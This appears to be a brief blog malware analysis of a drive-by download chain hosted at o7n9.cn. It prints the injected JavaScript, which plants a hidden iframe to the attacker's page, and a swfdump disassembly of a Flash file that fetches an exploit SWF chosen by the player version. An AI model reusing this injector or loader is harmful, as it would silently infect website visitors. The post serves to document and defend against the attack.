o7n9.cn/a.js

content of a.js essentially iframes to 456.htm

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("0wen0wen=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() +  24 * 1 * 60 * 60 * 1000);
document.cookie = "0wen0wen=funny;expires=" + expires.toGMTString();
try{
document.write("<iframe width=10 height=10 src=http://o7n9.cn/456.htm></iframe>");
}
catch(e)
{
};

content of 456.htm retrieves 2 SWF files 4561.swf and 4562.swf

swfdump -D 4561.swf
[HEADER]        File version: 8
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 164 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        89 DOACTION
(   50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/:$version" String:"http://o7n9.cn/" String:"i.swf" String:"_root"
(    4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version")
(    0 bytes) action: GetVariable
(    0 bytes) action: DefineLocal
(    4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion")
(    0 bytes) action: GetVariable
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:3 ("i.swf")
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:4 ("_root")
(    0 bytes) action: GetVariable
(    1 bytes) action: GetUrl2 64
(    0 bytes) action: Stop
(    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

So the 2 SWF files retrieves flash exploits by using the player version as part of the filename.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: